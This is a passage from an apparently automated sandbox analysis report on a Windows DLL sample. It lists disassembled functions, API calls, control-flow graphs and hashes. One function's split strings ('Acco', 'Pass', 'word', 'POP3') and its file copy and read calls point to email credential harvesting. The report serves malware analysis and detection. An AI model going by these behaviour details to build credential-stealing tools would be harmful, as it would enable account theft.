                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                              Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 94->90 95->92 102 1000c800-1000c80b GetProcAddress 96->102 103 1000c865 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->103 102->80 104 1000c80d-1000c81a VirtualProtect 102->104 103->95 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                              Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                              • String ID:
                                                              • API String ID: 2152742572-0
                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                              Non-executed Functions

                                                              Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                              • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                              • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                              • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                              Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                              • ExitProcess.KERNEL32 ref: 10004AEE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                              • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                              • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                              • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                              Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                              • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                              • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                              • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                              Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                              • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                              • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                              • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                              Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 155 10001995-10001999 152->155 156 10001987 152->156 153->152 157 10001854-10001881 call 100044b0 * 2 call 10001db7 153->157 155->150 155->151 159 1000198a-1000198d call 10002c40 156->159 170 10001887-1000189f call 100044b0 call 10001db7 157->170 171 1000193d-10001943 157->171 165 10001992 159->165 165->155 170->171 184 100018a5-100018a8 170->184 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->159 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->165 181 10001951-10001953 178->181 182 10001955-10001957 178->182 181->177 181->182 185 10001959-1000195b 182->185 186 1000195d-1000195f 182->186 188 100018c4-100018dc call 100044b0 call 10001db7 184->188 189 100018aa-100018c2 call 100044b0 call 10001db7 184->189 185->177 185->186 186->173 186->177 188->155 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->155
                                                              APIs
                                                                • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                              • _strlen.LIBCMT ref: 10001855
                                                              • _strlen.LIBCMT ref: 10001869
                                                              • _strlen.LIBCMT ref: 1000188B
                                                              • _strlen.LIBCMT ref: 100018AE
                                                              • _strlen.LIBCMT ref: 100018C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                              Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                              Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 298 10007df0-10007dfc 293->298 299 10007dda-10007ddf 293->299 302 10007dd1 294->302 303 10007dbd-10007dc0 294->303 295->296 304 10007d1c-10007d2e call 1000571e call 100091b8 295->304 296->277 298->290 311 10007dfe-10007e0b call 1000571e 298->311 308 10007de1-10007de4 299->308 309 10007ded 299->309 302->293 303->302 313 10007dc2-10007dd0 call 1000571e * 2 303->313 304->296 308->309 316 10007de6-10007dec call 1000571e 308->316 309->298 313->302 316->309
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                              • _free.LIBCMT ref: 10007CFB
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 10007D1D
                                                              • _free.LIBCMT ref: 10007D32
                                                              • _free.LIBCMT ref: 10007D3D
                                                              • _free.LIBCMT ref: 10007D5F
                                                              • _free.LIBCMT ref: 10007D72
                                                              • _free.LIBCMT ref: 10007D80
                                                              • _free.LIBCMT ref: 10007D8B
                                                              • _free.LIBCMT ref: 10007DC3
                                                              • _free.LIBCMT ref: 10007DCA
                                                              • _free.LIBCMT ref: 10007DE7
                                                              • _free.LIBCMT ref: 10007DFF
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                              • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                              • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                              • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                              Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 100059EA
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100059F6
                                                              • _free.LIBCMT ref: 10005A01
                                                              • _free.LIBCMT ref: 10005A0C
                                                              • _free.LIBCMT ref: 10005A17
                                                              • _free.LIBCMT ref: 10005A22
                                                              • _free.LIBCMT ref: 10005A2D
                                                              • _free.LIBCMT ref: 10005A38
                                                              • _free.LIBCMT ref: 10005A43
                                                              • _free.LIBCMT ref: 10005A51
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                              • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                              • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                              • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                              Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                              • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                              • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                              • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                              Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 389 10009563-10009565 382->389 390 1000953f-10009542 382->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 394 100095a1-100095b7 WriteFile 391->394 392->378 399 10009560-10009561 392->399 393->378 396 100095b9-100095ca 394->396 397 1000962a-10009630 GetLastError 394->397 396->378 400 100095cc-100095d0 396->400 397->378 399->391 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->397 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                              • __fassign.LIBCMT ref: 1000954F
                                                              • __fassign.LIBCMT ref: 1000956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                              • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                              • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                              • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                              • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                              • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                              Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 415 1000341b-10003428 call 10003790 411->415 412->413 414 100033cb 412->414 416 100033d0-100033e7 414->416 418 1000342d-10003436 call 10003330 415->418 419 100033e9-100033f7 call 10003740 416->419 420 100033fd 416->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 423 10003400-10003405 420->423 423->416 426 10003407-10003409 423->426 426->413 429 1000340b 426->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->423 438 10003498-100034a7 call 10003790 432->438 439 100034aa-100034c6 call 10003330 call 10003758 432->439 433->432 435 10003457-10003466 call 1000bbe0 433->435 443 10003483 435->443 444 10003468-10003480 435->444 438->439 443->432 444->443
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
